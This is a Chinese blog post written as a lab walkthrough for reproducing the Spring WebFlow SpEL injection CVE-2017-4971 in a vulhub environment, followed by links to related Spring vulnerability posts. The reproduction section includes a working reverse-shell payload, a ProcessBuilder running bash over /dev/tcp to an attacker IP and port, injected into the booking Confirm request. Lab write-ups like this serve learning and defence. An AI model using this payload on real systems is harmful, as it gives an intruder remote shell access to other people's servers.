spring框架远程代码执行漏洞(CVE-2017-4971)

最新推荐文章于 2024-04-08 01:28:12 发布
最新推荐文章于 2024-04-08 01:28:12 发布
阅读量5.4k 收藏 1
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123559392
版权

漏洞影响

影响版本:Spring WebFlow 2.4.0 - 2.4.4

漏洞复现

搭建漏洞环境并访问

点击左上角登录,使用左边给的用户名密码登录

登录后

访问 id=1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Proceed”

点击confirm时,进行抓包

 使用如下反弹shell的Payload

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub

 攻击机监听端口1234

 

放包,即可获取到shell

原理

就是在订阅酒店处,存在一个命令执行,直接调用了两个函数,这两个函数,一个是:addDefaultMappings ,一个是 addModelBindings。

其中,直接控制field这个值的函数是addDefaultMappings,且未做过滤,而addModelBindings是直接获取的java的一个配置文件,由配置文件来确定是否有 binder 节点,如果有,就无法触发代码执行。所以条件有两个:

(1)binder节点为空;

(2) useSpringBeanBinding 默认值(false)未修改。

由此可实际在代码中找到该页面,节点为空(代替命令执行语句)+默认值为false(点击Confirm按钮

Z_l123
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vackbot已覆盖 |【漏洞通告】Spring框架远程代码执行漏洞
Moyun_vackbot的博客
04-02 3961
近日,墨云科技监测到Spring框架中存在远程代码执行漏洞,在JDK 9及以上版本环境下,攻击者通过构造恶意的请求修改中间件的日志文件,从而实现远程代码执行
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
在2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
Spring远程代码执行漏洞
Snowflake1997的博客
03-18 6116
首先进入漏洞环境 构造所需漏洞 docker-compose up -d 在浏览器中访问 首先访问http://your-ip:8080/login,用页面左边给出的任意一个账号/密码登录系统: 然后访问id为1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了): 再点击确认“Confirm”: 此时抓包,抓到一个POST数据包,我们向
SpringBoot项目中 Spring Framework远程代码执行漏洞的处理方案
最新发布
傲泣龙腾的博客
04-08 3921
公司最近要求对所有项目进行漏洞检测修复,其中有一项漏洞名称为Spring Framework远程代码执行漏洞CVE-2022-22965)需要升级Spring Framework版本解决,如图高危修复建议将Spring Framework升级至安全版本 ,即升级5.2.20及以上版本 或 5.3.18及以上版本,具体官方修复的5.2和5.3版本可以查找。
Spring Framework远程代码执行漏洞_CVE-2022-22965复现
ANYOUZHEN的博客
06-04 879
漏洞描述及背景:准备复现在kali上使用vulhub打开环境: docker-compose up -d查看vulhub的信息,可以看到端口为8080,输入网址http://127.0.0.1:8080/ 按照作者的链接:http://127.0.0.1:8080/?name=Bob&age=25 然后根据提示,构造请求地址: 对该地址进行抓包,抓包前记得修改bp默认端口,因为默认端口8080和本次ip地址冲突了,改完后记得把火狐插件上面的也进行更改,反正不是8080就行。(这里建议弄两个,一个8080
[Vulfocus解题系列]Spring WebFlow 远程代码执行漏洞CVE-2017-4971
00勇士王子的博客
03-29 449
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。影响版本:Spring Web Flow 2.4.0 到 2.4.4。
Spring框架(Framework)存在远程命令执行漏洞
qq_20025777的博客
08-31 549
Spring框架存在远程命令执行漏洞
CVE-2018-3191利用exp
01-08
这是一个远程代码执行漏洞,影响了Oracle WebLogic Server的多个版本,包括但不限于10.3.6.0。当WebLogic服务器处理特定类型的JNDI反序列化请求时,恶意构造的数据可能导致服务器执行攻击者控制的代码。这种攻击通常...
CVE-2022-22965 GUItools个图形化利用工具
04-06
3月31日,spring 官方通报了 Spring 相关框架存在远程代码执行漏洞,并在 5.3.18 和 5.2.20.RELEASE 中修复了该漏洞漏洞评级:严重 影响组件:org.springframework:spring-beans 影响版本:和 的Spring框架均...
spring-framework-5.0.5.RELEASE 漏洞修复
04-11
Spring框架中的spring-messaging模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,因此攻击者可以通过构造恶意的消息来实现远程代码执行。 Windows平台...
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
Spring Web Flow 远程代码执行漏洞分析
weixin_67271870的博客
11-23 554
漏洞2017年5月31号被提交到平台,官方并没有详细的信息,通过官方描述和补丁的对比,我们可以大致推断应该是Spring WebFlow在Model的数据绑定上面,由于没有明确指定相关model的具体属性导致从表可以提交恶意的表达式从而被执行,导致任意代码执行漏洞,这个漏洞利用除了版本的限制之外还有两个前置条件,这两个前置条件中有一个是默认配置,另外一个就是编码规范了,漏洞能不能利用成功主要就取决于后面的条件。
【干货】Spring远程命令执行漏洞CVE-2022-22965)原理分析和思考
qq_53058639的博客
07-22 1370
上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。
Spring远程代码执行漏洞CVE-2017-4971
tbygadgjsad的博客
03-17 695
运行测试环境:docker-compose up -d 等待环境启动后,访问http://ip:8080,将看到一个酒店预订的页面 首先访问http://ip:8080/login,用页面左边给出的任意一个账号/密码登录系统: 然后访问id为1的酒店http://ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了): 再点击确认“Confirm”:进行抓包 ...
Spring WebFlow 远程代码执行漏洞CVE-2017-4971 绿盟科技发布安全威胁通告
weixin_34132768的博客
09-01 562
Spring出现WebFlow 远程代码执行漏洞(CVE-2017-4971),该漏洞是去年年底提交的,CVE目前还处于保留状态。但有消息称,相关信息在5月31日被公开,据公开消息称,这个漏洞影响SpringWebFlow 的2.4.0到2.4.4,以及更早期的版本。PoC已经公开。绿盟科技发布安全威胁通告。 Spring Web Flow 是什...
CVE-2017-4971-Spring Web Flow RCE漏洞复现
m0_58596609的博客
04-21 2596
CVE-2017-4971-Spring Web Flow RCE漏洞复现
Spring RCE 0day高危预警
Websec
03-30 804
3月29日,Spring框架曝出RCE 0day漏洞。已经证实由于 SerializationUtils#deserialize 基于 Java 的序列化机制,可导致远程代码执行 (RCE),使用JDK9及以上版本皆有可能受到影响。 相关监测发现该漏洞可能已被远程攻击者利用,广东省网络安全应急响应中心连夜发布预警通知,考虑到Spring框架的广泛应用,FreeBuf对漏洞评级为:危险。 漏洞描述: 作为目前全球最受欢迎的Java轻量级开源框架Spring允许开发人员专注于业务逻辑,简化Java企
PHP 远程代码执行漏洞(CVE-2022-31625)修复办法
07-14
针对PHP远程代码执行漏洞(CVE-2022-31625),以下是一些修复方法: 1. 更新到最新版本:确保你的PHP版本是最新的,因为漏洞修复通常会包含在更新中。请访问PHP官方网站或者使用包管理工具来获取最新版本。 2. 禁用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值